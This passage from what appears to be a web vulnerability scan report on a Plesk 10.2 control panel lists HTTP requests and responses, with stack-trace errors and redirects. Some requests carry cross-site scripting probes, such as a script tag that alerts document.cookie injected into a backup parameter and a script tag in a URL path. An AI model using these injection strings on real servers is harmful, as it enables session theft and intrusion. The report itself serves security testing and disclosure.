<a class="s-btn" href="#" onclick='apsCatalog.showDetails({"id":"4e08193654b81aa9ea38e12d232d2ffe","guid":"tag:catalog.marketplace.parallels.com,2011-04-20:\/1.2\/www.joomla.org\/joomla\/1.5.20-2\/Parallels\/undefined\/undefined\/undefined","appId":"http:\/\/www.joomla.org\/","name":"joomla","version":"1.5.20","release":"2","vendor":"www.joomla.org","packager":"Parallels","isAps":true,"packageUrl":"","rating":90,"packageId":0,"categories":["Web\/Content management"]})'><i><i><i>
<span>Learn more</span>
</i></i></i></a>
</div>
</div>
</li><li class="odd">
<div class="package-block">
<div class="package-content clearfix">
<div class="package-icon">
<a href="#" onclick='apsCatalog.showDetails({"id":"50561804184fcd759d8a74a126d50435","guid":"tag:catalog.marketplace.parallels.com,2009-07-27:\/none\/Keepit\/Keepit%20Online%20Backup\/1-1\/Keepit\/undefined\/undefined\/undefined","appId":"https:\/\/www.keepit.com\/unlimited","name":"Keepit Online Backup","version":"1","release":"1","vendor":"Keepit","packager":"Keepit","isAps":false,"packageUrl":"https:\/\/www.keepit.com\/downloadstep","rating":80,"packageId":0,"categories":["Web\/Tools"]})'><img src="http://catalog.marketplace.parallels.com/static/images/nonaps/keepit-box.png"/></a>
</div>
<div class="package-info">
<h4><a href="#" onclick='apsCatalog.showDetails({"id":"50561804184fcd759d8a74a126d50435","guid":"tag:catalog.marketplace.parallels.com,2009-07-27:\/none\/Keepit\/Keepit%20Online%20Backup\/1-1\/Keepit\/undefined\/undefined\/undefined","appId":"https:\/\/www.keepit.com\/unlimited","name":"Keepit Online Backup","version":"1","release":"1","vendor":"Keepit","packager":"Keepit","isAps":false,"packageUrl":"https:\/\/www.keepit.com\/downloadstep","rating":80,"packageId":0,"categories":["Web\/Tools"]})'>Keepit Online Backup</a></h4>
<div class="package-description">Backup desktop files and documents to the Cloud</div>
</div>
</div>
<div class="package-actions">
<a class="s-btn action" href="#" onclick='Smb.ApsLicense.buy("https://shop.marketplace.parallels.com/index.php?act=marketplace_dispatch", "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"); apsCatalog.showDetails({"id":"50561804184fcd759d8a74a126d50435","guid":"tag:catalog.marketplace.parallels.com,2009-07-27:\/none\/Keepit\/Keepit%20Online%20Backup\/1-1\/Keepit\/undefined\/undefined\/undefined","appId":"https:\/\/www.keepit.com\/unlimited","name":"Keepit Online Backup","version":"1","release":"1","vendor":"Keepit","packager":"Keepit","isAps":false,"packageUrl":"https:\/\/www.keepit.com\/downloadstep","rating":80,"packageId":0,"categories":["Web\/Tools"]}); return false;'><i><i><i>
<span>Buy now</span>
</i></i></i></a>
<a class="s-btn" href="#" onclick='apsCatalog.showDetails({"id":"50561804184fcd759d8a74a126d50435","guid":"tag:catalog.marketplace.parallels.com,2009-07-27:\/none\/Keepit\/Keepit%20Online%20Backup\/1-1\/Keepit\/undefined\/undefined\/undefined","appId":"https:\/\/www.keepit.com\/unlimited","name":"Keepit Online Backup","version":"1","release":"1","vendor":"Keepit","packager":"Keepit","isAps":false,"packageUrl":"https:\/\/www.keepit.com\/downloadstep","rating":80,"packageId":0,"categories":["Web\/Tools"]})'><i><i><i>
<span>Learn more</span>
</i></i></i></a>
</div>
</div>
</li><li class="even">
<div class="package-block">
<div class="package-content clearfix">
<div class="package-icon">
<a href="#" onclick='apsCatalog.showDetails({"id":"031f7f49d41447a6effe31bdd0cb6f25","guid":"tag:catalog.marketplace.parallels.com,2010-10-21:\/none\/Parallels\/Parallels%20Premium%20Anti-Virus\/1-1\/Parallels\/undefined\/undefined\/undefined","appId":"http:\/\/www.parallels.com\/store\/premiumantivirus\/","name":"Parallels Premium Anti-Virus","version":"1","release":"1","vendor":"Parallels","packager":"Parallels","isAps":false,"packageUrl":"","rating":70,"packageId":0,"categories":[]})'><img src="http://catalog.marketplace.parallels.com/static/images/nonaps/PPAV-icon.png"/></a>
</div>
<div class="package-info">
<h4><a href="#" onclick='apsCatalog.showDetails({"id":"031f7f49d41447a6effe31bdd0cb6f25","guid":"tag:catalog.marketplace.parallels.com,2010-10-21:\/none\/Parallels\/Parallels%20Premium%20Anti-Virus\/1-1\/Parallels\/undefined\/undefined\/undefined","appId":"http:\/\/www.parallels.com\/store\/premiumantivirus\/","name":"Parallels Premium Anti-Virus","version":"1","release":"1","vendor":"Parallels","packager":"Parallels","isAps":false,"packageUrl":"","rating":70,"packageId":0,"categories":[]})'>Parallels Premium Anti-Virus</a></h4>
<div class="package-description">Protect your customers&#039; mailboxes against worms, Trojans and other viruses</div>
</div>
</div>
<div class="package-actions">
<a class="s-btn action" href="#" onclick='Smb.ApsLicense.buy("https://shop.marketplace.parallels.com/index.php?act=marketplace_dispatch", "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"); apsCatalog.showDetails({"id":"031f7f49d41447a6effe31bdd0cb6f25","guid":"tag:catalog.marketplace.parallels.com,2010-10-21:\/none\/Parallels\/Parallels%20Premium%20Anti-Virus\/1-1\/Parallels\/undefined\/undefined\/undefined","appId":"http:\/\/www.parallels.com\/store\/premiumantivirus\/","name":"Parallels Premium Anti-Virus","version":"1","release":"1","vendor":"Parallels","packager":"Parallels","isAps":false,"packageUrl":"","rating":70,"packageId":0,"categories":[]}); return false;'><i><i><i>
<span>Buy now</span>
</i></i></i></a>
<a class="s-btn" href="#" onclick='apsCatalog.showDetails({"id":"031f7f49d41447a6effe31bdd0cb6f25","guid":"tag:catalog.marketplace.parallels.com,2010-10-21:\/none\/Parallels\/Parallels%20Premium%20Anti-Virus\/1-1\/Parallels\/undefined\/undefined\/undefined","appId":"http:\/\/www.parallels.com\/store\/premiumantivirus\/","name":"Parallels Premium Anti-Virus","version":"1","release":"1","vendor":"Parallels","packager":"Parallels","isAps":false,"packageUrl":"","rating":70,"packageId":0,"categories":[]})'><i><i><i>
<span>Learn more</span>
</i></i></i></a>
</div>
</div>
</li><li class="odd">
<div class="package-block">
<div class="package-content clearfix">
<div class="package-icon">
<a href="#" onclick='apsCatalog.showDetails({"id":"7e226faac0bd8495bd9a86e683d8426e","guid":"tag:catalog.marketplace.parallels.com,2011-04-20:\/1\/www.phpbb.com\/phpBB\/3.0.4-4\/parallels.com\/undefined\/undefined\/undefined","appId":"http:\/\/www.phpbb.com\/phpBB","name":"phpBB","version":"3.0.4","release":"4","vendor":"www.phpbb.com","packager":"parallels.com","isAps":true,"packageUrl":"","rating":60,"packageId":0,"categories":["Web\/Forum"]})'><img src="http://catalog.marketplace.parallels.com/storage/www.phpbb.com/phpBB/3.0.4-4/parallels.com/undefined/undefined/undefined/resources/images/icon.png"/></a>
</div>
<div class="package-info">
<h4><a href="#" onclick='apsCatalog.showDetails({"id":"7e226faac0bd8495bd9a86e683d8426e","guid":"tag:catalog.marketplace.parallels.com,2011-04-20:\/1\/www.phpbb.com\/phpBB\/3.0.4-4\/parallels.com\/undefined\/undefined\/undefined","appId":"http:\/\/www.phpbb.com\/phpBB","name":"phpBB","version":"3.0.4","release":"4","vendor":"www.phpbb.com","packager":"parallels.com","isAps":true,"packageUrl":"","rating":60,"packageId":0,"categories":["Web\/Forum"]})'>phpBB</a></h4>
<div class="package-description">Create a web forum or bulletin board in minutes</div>
</div>
</div>
<div class="package-actions">
<a class="s-btn" href="#" onclick='apsCatalog.install({"id":"7e226faac0bd8495bd9a86e683d8426e","guid":"tag:catalog.marketplace.parallels.com,2011-04-20:\/1\/www.phpbb.com\/phpBB\/3.0.4-4\/parallels.com\/undefined\/undefined\/undefined","appId":"http:\/\/www.phpbb.com\/phpBB","name":"phpBB","version":"3.0.4","release":"4","vendor":"www.phpbb.com","packager":"parallels.com","isAps":true,"packageUrl":"","rating":60,"packageId":0,"categories":["Web\/Forum"]});return false;; return false;'><i><i><i>
<span>Install</span>
</i></i></i></a>
<a class="s-btn" href="#" onclick='apsCatalog.showDetails({"id":"7e226faac0bd8495bd9a86e683d8426e","guid":"tag:catalog.marketplace.parallels.com,2011-04-20:\/1\/www.phpbb.com\/phpBB\/3.0.4-4\/parallels.com\/undefined\/undefined\/undefined","appId":"http:\/\/www.phpbb.com\/phpBB","name":"phpBB","version":"3.0.4","release":"4","vendor":"www.phpbb.com","packager":"parallels.com","isAps":true,"packageUrl":"","rating":60,"packageId":0,"categories":["Web\/Forum"]})'><i><i><i>
<span>Learn more</span>
</i></i></i></a>
</div>
</div>
</li><li class="even">
<div class="package-block">
<div class="package-content clearfix">
<div class="package-icon">
<a href="#" onclick='apsCatalog.showDetails({"id":"9fb54e3878b6fc9ffdafe03546f6817c","guid":"tag:catalog.marketplace.parallels.com,2011-04-20:\/1.2\/gallery.menalto.com\/gallery\/2.3.1-4\/Parallels\/undefined\/undefined\/undefined","appId":"http:\/\/gallery.menalto.com\/","name":"gallery","version":"2.3.1","release":"4","vendor":"gallery.menalto.com","packager":"Parallels","isAps":true,"packageUrl":"","rating":50,"packageId":0,"categories":["Web\/Gallery"]})'><img src="http://catalog.marketplace.parallels.com/storage/gallery.menalto.com/gallery/2.3.1-4/Parallels/undefined/undefined/undefined/resources/images/icon.png"/></a>
</div>
<div class="package-info">
<h4><a href="#" onclick='apsCatalog.showDetails({"id":"9fb54e3878b6fc9ffdafe03546f6817c","guid":"tag:catalog.marketplace.parallels.com,2011-04-20:\/1.2\/gallery.menalto.com\/gallery\/2.3.1-4\/Parallels\/undefined\/undefined\/undefined","appId":"http:\/\/gallery.menalto.com\/","name":"gallery","version":"2.3.1","release":"4","vendor":"gallery.menalto.com","packager":"Parallels","isAps":true,"packageUrl":"","rating":50,"packageId":0,"categories":["Web\/Gallery"]})'>gallery</a></h4>
<div class="package-description">Quickly organize your photos online</div>
</div>
</div>
<div class="package-actions">
<a class="s-btn" href="#" onclick='apsCatalog.install({"id":"9fb54e3878b6fc9ffdafe03546f6817c","guid":"tag:catalog.marketplace.parallels.com,2011-04-20:\/1.2\/gallery.menalto.com\/gallery\/2.3.1-4\/Parallels\/undefined\/undefined\/undefined","appId":"http:\/\/gallery.menalto.com\/","name":"gallery","version":"2.3.1","release":"4","vendor":"gallery.menalto.com","packager":"Parallels","isAps":true,"packageUrl":"","rating":50,"packageId":0,"categories":["Web\/Gallery"]});return false;; return false;'><i><i><i>
<span>Install</span>
</i></i></i></a>
<a class="s-btn" href="#" onclick='apsCatalog.showDetails({"id":"9fb54e3878b6fc9ffdafe03546f6817c","guid":"tag:catalog.marketplace.parallels.com,2011-04-20:\/1.2\/gallery.menalto.com\/gallery\/2.3.1-4\/Parallels\/undefined\/undefined\/undefined","appId":"http:\/\/gallery.menalto.com\/","name":"gallery","version":"2.3.1","release":"4","vendor":"gallery.menalto.com","packager":"Parallels","isAps":true,"packageUrl":"","rating":50,"packageId":0,"categories":["Web\/Gallery"]})'><i><i><i>
<span>Learn more</span>
</i></i></i></a>
</div>
</div>
</li><li class="odd">
<div class="package-block">
<div class="package-content clearfix">
<div class="package-icon">
<a href="#" onclick='apsCatalog.showDetails({"id":"77410f204e0929a7aa85cd65c74796d8","guid":"tag:catalog.marketplace.parallels.com,2011-03-06:\/none\/Parallels\/Trustwave%20PCI%20Validation\/1-0\/Parallels\/undefined\/undefined\/undefined","appId":"https:\/\/www.trustwave.com\/vulnerabilityScanning.php","name":"Trustwave PCI Validation","version":"1","release":"0","vendor":"Parallels","packager":"Parallels","isAps":false,"packageUrl":"https:\/\/www.trustkeeper.net\/esp\/Login.public","rating":50,"packageId":0,"categories":["Back office\/Compliance and Risk Management"]})'><img src="http://catalog.marketplace.parallels.com/static/images/nonaps/trust_wave.jpg"/></a>
</div>
<div class="package-info">
<h4><a href="#" onclick='apsCatalog.showDetails({"id":"77410f204e0929a7aa85cd65c74796d8","guid":"tag:catalog.marketplace.parallels.com,2011-03-06:\/none\/Parallels\/Trustwave%20PCI%20Validation\/1-0\/Parallels\/undefined\/undefined\/undefined","appId":"https:\/\/www.trustwave.com\/vulnerabilityScanning.php","name":"Trustwave PCI Validation","version":"1","release":"0","vendor":"Parallels","packager":"Parallels","isAps":false,"packageUrl":"https:\/\/www.trustkeeper.net\/esp\/Login.public","rating":50,"packageId":0,"categories":["Back office\/Compliance and Risk Management"]})'>Trustwave PCI Validation</a></h4>
<div class="package-description">Utilize Trustwave monthly server scans to keep you PCI compliant</div>
</div>
</div>
<div class="package-actions">
<a class="s-btn action" href="#" onclick='Smb.ApsLicense.buy("https://shop.marketplace.parallels.com/index.php?act=marketplace_dispatch", "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"); apsCatalog.showDetails({"id":"77410f204e0929a7aa85cd65c74796d8","guid":"tag:catalog.marketplace.parallels.com,2011-03-06:\/none\/Parallels\/Trustwave%20PCI%20Validation\/1-0\/Parallels\/undefined\/undefined\/undefined","appId":"https:\/\/www.trustwave.com\/vulnerabilityScanning.php","name":"Trustwave PCI Validation","version":"1","release":"0","vendor":"Parallels","packager":"Parallels","isAps":false,"packageUrl":"https:\/\/www.trustkeeper.net\/esp\/Login.public","rating":50,"packageId":0,"categories":["Back office\/Compliance and Risk Management"]}); return false;'><i><i><i>
<span>Buy now</span>
</i></i></i></a>
<a class="s-btn" href="#" onclick='apsCatalog.showDetails({"id":"77410f204e0929a7aa85cd65c74796d8","guid":"tag:catalog.marketplace.parallels.com,2011-03-06:\/none\/Parallels\/Trustwave%20PCI%20Validation\/1-0\/Parallels\/undefined\/undefined\/undefined","appId":"https:\/\/www.trustwave.com\/vulnerabilityScanning.php","name":"Trustwave PCI Validation","version":"1","release":"0","vendor":"Parallels","packager":"Parallels","isAps":false,"packageUrl":"https:\/\/www.trustkeeper.net\/esp\/Login.public","rating":50,"packageId":0,"categories":["Back office\/Compliance and Risk Management"]})'><i><i><i>
<span>Learn more</span>
</i></i></i></a>
</div>
</div>
</li></ul></div>

12.9. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/email-address/create

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /smb/email-address/create

Request

GET /smb/email-address/create HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/smb/email-address/list
Cookie: PLESKSESSID=d8ef408a62e3c0d46c9effc4a0828d66; locale=en-US

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 21:11:16 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 21:11:16 GMT
Connection: close
Content-Length: 1269


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-20110407.20"/></script>
       <script language="javascript" type="text/javascript" src="/javascript/prototype.js?plesk_version=psa-10.2.0-20110407.20"></script>
       <script>
           var opt_no_frames = false;
           var opt_integrated_mode = false;
       </script>
       
       </head><body onLoad=";top.location='/login.php3';"></body><noscript>You will be redirected to the new address in 15 seconds... If you are not automatically taken to the new location, please enable javascript or click the hyperlink <a href="/login.php3" target="top">/login.php3</a>.</noscript></html><!--______________________________________________________________________________________________________________________________________________________________________________________________________________________________________________IE error page size limitation______________________________________________________________________________________________________________________________________________________________________________________________________________________________________________-->

12.10. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/email-address/edit/id/2

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /smb/email-address/edit/id/2

Request

POST /smb/email-address/edit/id/2 HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/smb/email-address/edit/id/2
Origin: http://www.nosedivesailing.com:8880
X-Prototype-Version: 1.6.1_rc3
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-type: application/x-www-form-urlencoded; charset=UTF-8
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PLESKSESSID=17161f28b87a6960fb097d11330c9c53; locale=en-US; psaContext=dashboard
Content-Length: 862

general%5BgeneralSection%5D%5Bname%5D=fdf080d9224fd0d18957a62c&general%5BgeneralSection%5D%5Bpostbox%5D=0&general%5BgeneralSection%5D%5Bpostbox%5D=1&general%5BgeneralSection%5D%5BmboxQuotaValue%5D=1047527424&general-generalSection-mboxQuotaValue-selector=specific&redirect%5BredirectSection%5D%5Benabled%5D=0&aliases%5BaliasesSection%5D%5BaliasesForm%5D%5Bc632267%5D%5BaliasName%5D=&aliases%5BaliasesSection%5D%5BaliasesForm%5D%5BdynamicSubFormTemplate%5D%5BaliasName%5D=&autoResponder%5BautoResponderSection%5D%5Benabled%5D=0&autoResponder%5BautoResponderSection%5D%5BcontentType%5D=false&autoResponder%5BautoResponderSection%5D%5BforwardAddress%5D=&autoResponder%5BautoResponderSection%5D%5Battachments%5D%5BdynamicSubFormTemplate%5D%5Bfile%5D=&antivirus%5BantivirusSection%5D%5Benabled%5D=0&hidden=&forgery_protection_token=3e86204e9517123c7f585d736d64aa3f&_=

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 18:38:02 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 18:38:01 GMT
Connection: close
Content-Length: 156

ERROR: PleskFatalException
wrong id

0: UserClient.php:23
   UserClient->__construct(NULL null)
1: class.Session.php:227
   Session->getUser()
2: auth.php3:296

12.11. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/email-address/edit/id/4

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /smb/email-address/edit/id/4

Request

GET /smb/email-address/edit/id/4 HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/smb/email-address/list
Cookie: PLESKSESSID=d8ef408a62e3c0d46c9effc4a0828d66; locale=en-US

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 21:11:16 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 21:11:16 GMT
Connection: close
Content-Length: 1269


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-20110407.20"/></script>
       <script language="javascript" type="text/javascript" src="/javascript/prototype.js?plesk_version=psa-10.2.0-20110407.20"></script>
       <script>
           var opt_no_frames = false;
           var opt_integrated_mode = false;
       </script>
       
       </head><body onLoad=";top.location='/login.php3';"></body><noscript>You will be redirected to the new address in 15 seconds... If you are not automatically taken to the new location, please enable javascript or click the hyperlink <a href="/login.php3" target="top">/login.php3</a>.</noscript></html><!--______________________________________________________________________________________________________________________________________________________________________________________________________________________________________________IE error page size limitation______________________________________________________________________________________________________________________________________________________________________________________________________________________________________________-->

12.12. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/user/create

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /smb/user/create

Request

GET /smb/user/create HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 18:26:35 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: PLESKSESSID=3167c639ce1b08f48e3049df3f758ec8; path=/
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 18:26:34 GMT
Connection: close
Content-Length: 1269


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-20110407.20"/></script>
       <script language="javascript" type="text/javascript" src="/javascript/prototype.js?plesk_version=psa-10.2.0-20110407.20"></script>
       <script>
           var opt_no_frames = false;
           var opt_integrated_mode = false;
       </script>
       
       </head><body onLoad=";top.location='/login.php3';"></body><noscript>You will be redirected to the new address in 15 seconds... If you are not automatically taken to the new location, please enable javascript or click the hyperlink <a href="/login.php3" target="top">/login.php3</a>.</noscript></html><!--______________________________________________________________________________________________________________________________________________________________________________________________________________________________________________IE error page size limitation______________________________________________________________________________________________________________________________________________________________________________________________________________________________________________-->

12.13. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/user/edit/id/4

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /smb/user/edit/id/4

Request

POST /smb/user/edit/id/4 HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/smb/user/edit/id/4
Origin: http://www.nosedivesailing.com:8880
X-Prototype-Version: 1.6.1_rc3
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-type: application/x-www-form-urlencoded; charset=UTF-8
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PLESKSESSID=17161f28b87a6960fb097d11330c9c53; locale=en-US; psaContext=dashboard
Content-Length: 786

general%5Bvcard%5D%5BcontactName%5D=format-1&general%5Bvcard%5D%5Bemail%5D%5BemailType%5D=internal&general%5Bvcard%5D%5Bemail%5D%5BinternalEmail%5D=fdf080d9224fd0d18957a62c&general%5Bvcard%5D%5BroleId%5D=7&general%5Baccount%5D%5Bpassword%5D=&general%5Baccount%5D%5BpasswordConfirmation%5D=&general%5Baccount%5D%5BisActive%5D=0&general%5Baccount%5D%5BisActive%5D=1&contacts%5BcontactsSection%5D%5BcompanyName%5D=1&contacts%5BcontactsSection%5D%5Bphone%5D=1&contacts%5BcontactsSection%5D%5Bfax%5D=1&contacts%5BcontactsSection%5D%5Baddress%5D=1&contacts%5BcontactsSection%5D%5Bcity%5D=1&contacts%5BcontactsSection%5D%5Bstate%5D=1&contacts%5BcontactsSection%5D%5Bzip%5D=10010&contacts%5BcontactsSection%5D%5Bcountry%5D=US&hidden=&forgery_protection_token=3e86204e9517123c7f585d736d64aa3f&_=

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 18:38:02 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 18:38:01 GMT
Connection: close
Content-Length: 156

ERROR: PleskFatalException
wrong id

0: UserClient.php:23
   UserClient->__construct(NULL null)
1: class.Session.php:227
   Session->getUser()
2: auth.php3:296

12.14. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/web/view

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /smb/web/view

Request

GET /smb/web/view HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/plesk/client@2/domain@1/backup/create/?forgery_protection_token=48333f77aef379c04c82252b59636182&cmd=update&lock=true&previous_page=%0d&wizaction=%0d&prefix=bak&comment=Domain++backup.%0d%0aCreation+date%3a+May+23%2c+2011+02%3a39+PM&split_backup=false&repository=local&email=%0da42c4%22%3e%3cscript%3ealert%28document.cookie%29%3c%2fscript%3ee3e36e04876dbfe97&content=configuration_and_content&content_type=backup_content_all_at_domain&suspend=false
Cookie: locale=en-US; psaContext=dashboard; PLESKSESSID=477d74767594b11beea56c0b8a43890e

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 21:12:46 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 21:12:46 GMT
Connection: close
Content-Length: 1269


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-20110407.20"/></script>
       <script language="javascript" type="text/javascript" src="/javascript/prototype.js?plesk_version=psa-10.2.0-20110407.20"></script>
       <script>
           var opt_no_frames = false;
           var opt_integrated_mode = false;
       </script>
       
       </head><body onLoad=";top.location='/login.php3';"></body><noscript>You will be redirected to the new address in 15 seconds... If you are not automatically taken to the new location, please enable javascript or click the hyperlink <a href="/login.php3" target="top">/login.php3</a>.</noscript></html><!--______________________________________________________________________________________________________________________________________________________________________________________________________________________________________________IE error page size limitation______________________________________________________________________________________________________________________________________________________________________________________________________________________________________________-->

12.15. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/web/view/id/1/%3Cscript%3Ealert(1)%3C/fdf080d9f1bbdb1b327620b2

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /smb/web/view/id/1/%3Cscript%3Ealert(1)%3C/fdf080d9f1bbdb1b327620b2

Request

GET /smb/web/view/id/1/%3Cscript%3Ealert(1)%3C/fdf080d9f1bbdb1b327620b2?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: locale=en-US

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Tue, 24 May 2011 01:42:27 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: PLESKSESSID=d2f17440e69c73361dcc188944327624; path=/
X-Powered-By: ASP.NET
Date: Tue, 24 May 2011 01:42:27 GMT
Connection: close
Content-Length: 1269


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-20110407.20"/></script>
